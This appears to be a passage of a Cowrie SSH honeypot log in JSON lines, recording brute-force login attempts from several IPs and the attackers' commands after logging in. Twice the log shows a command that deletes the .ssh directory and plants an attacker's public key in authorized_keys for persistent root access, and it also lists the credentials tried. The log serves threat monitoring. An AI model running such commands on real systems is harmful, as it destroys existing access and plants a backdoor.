03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:58:46.777690Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.login.success","username":"root","password":"mingyuan","message":"login attempt [root/mingyuan] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:58:47.827660Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:58:48.385623Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:58:48.386325Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:58:48.387384Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:48.640840Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:58:49.200165Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:58:49.200809Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:58:49.455637Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:49.456459Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":53814,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4edfa6719fd","protocol":"ssh","message":"New connection: 152.32.190.168:53814 (1.2.3.4:22) [session: e4edfa6719fd]","sensor":"my-vps","timestamp":"2025-09-09T03:58:49.714578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:49.715461Z","src_ip":"152.32.190.168","session":"e4edfa6719fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:58:49.972999Z","src_ip":"152.32.190.168","session":"e4edfa6719fd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:58:51.046053Z","src_ip":"152.32.190.168","session":"e4edfa6719fd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:52.306727Z","src_ip":"152.32.190.168","session":"e4edfa6719fd"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":53816,"dst_ip":"1.2.3.4","dst_port":22,"session":"42d9d8e10fc7","protocol":"ssh","message":"New connection: 152.32.190.168:53816 (1.2.3.4:22) [session: 42d9d8e10fc7]","sensor":"my-vps","timestamp":"2025-09-09T03:58:52.559366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:52.560020Z","src_ip":"152.32.190.168","session":"42d9d8e10fc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:58:52.814843Z","src_ip":"152.32.190.168","session":"42d9d8e10fc7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:58:53.872760Z","src_ip":"152.32.190.168","session":"42d9d8e10fc7"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:54.129072Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:54.129971Z","src_ip":"152.32.190.168","session":"42d9d8e10fc7"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":39120,"dst_ip":"1.2.3.4","dst_port":22,"session":"43c6fa93bbe2","protocol":"ssh","message":"New connection: 103.59.95.12:39120 (1.2.3.4:22) [session: 43c6fa93bbe2]","sensor":"my-vps","timestamp":"2025-09-09T03:58:59.566982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:59.568176Z","src_ip":"103.59.95.12","session":"43c6fa93bbe2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:58:59.839887Z","src_ip":"103.59.95.12","session":"43c6fa93bbe2"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":53516,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c1d31e1a9db","protocol":"ssh","message":"New connection: 51.81.118.153:53516 (1.2.3.4:22) [session: 1c1d31e1a9db]","sensor":"my-vps","timestamp":"2025-09-09T03:59:00.047197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:59:00.047863Z","src_ip":"51.81.118.153","session":"1c1d31e1a9db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:59:00.150888Z","src_ip":"51.81.118.153","session":"1c1d31e1a9db"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"abc123","message":"login attempt [monitor/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T03:59:00.599052Z","src_ip":"51.81.118.153","session":"1c1d31e1a9db"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"123456","message":"login attempt [hacker/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T03:59:00.983492Z","src_ip":"103.59.95.12","session":"43c6fa93bbe2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:01.703861Z","src_ip":"51.81.118.153","session":"1c1d31e1a9db"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:02.261827Z","src_ip":"103.59.95.12","session":"43c6fa93bbe2"}
{"eventid":"cowrie.session.connect","src_ip":"193.111.234.118","src_port":49244,"dst_ip":"1.2.3.4","dst_port":22,"session":"7111f96a2ef9","protocol":"ssh","message":"New connection: 193.111.234.118:49244 (1.2.3.4:22) [session: 7111f96a2ef9]","sensor":"my-vps","timestamp":"2025-09-09T03:59:07.309742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:59:07.310626Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:59:07.396658Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome_1","message":"login attempt [root/Welcome_1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:59:07.781035Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:59:07.973341Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:59:07.974070Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:59:07.975250Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:08.068909Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:59:08.341585Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:59:08.342237Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:59:08.429890Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:08.430783Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.session.connect","src_ip":"193.111.234.118","src_port":49246,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b918e754a32","protocol":"ssh","message":"New connection: 193.111.234.118:49246 (1.2.3.4:22) [session: 1b918e754a32]","sensor":"my-vps","timestamp":"2025-09-09T03:59:08.528672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:59:08.529565Z","src_ip":"193.111.234.118","session":"1b918e754a32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:59:08.625713Z","src_ip":"193.111.234.118","session":"1b918e754a32"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:59:09.050175Z","src_ip":"193.111.234.118","session":"1b918e754a32"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:10.149042Z","src_ip":"193.111.234.118","session":"1b918e754a32"}
{"eventid":"cowrie.session.connect","src_ip":"193.111.234.118","src_port":49248,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d6713f508d5","protocol":"ssh","message":"New connection: 193.111.234.118:49248 (1.2.3.4:22) [session: 0d6713f508d5]","sensor":"my-vps","timestamp":"2025-09-09T03:59:10.249703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:59:10.250695Z","src_ip":"193.111.234.118","session":"0d6713f508d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:59:10.347724Z","src_ip":"193.111.234.118","session":"0d6713f508d5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:59:10.730121Z","src_ip":"193.111.234.118","session":"0d6713f508d5"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:10.828169Z","src_ip":"193.111.234.118","session":"7111f96a2ef9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:10.829296Z","src_ip":"193.111.234.118","session":"0d6713f508d5"}
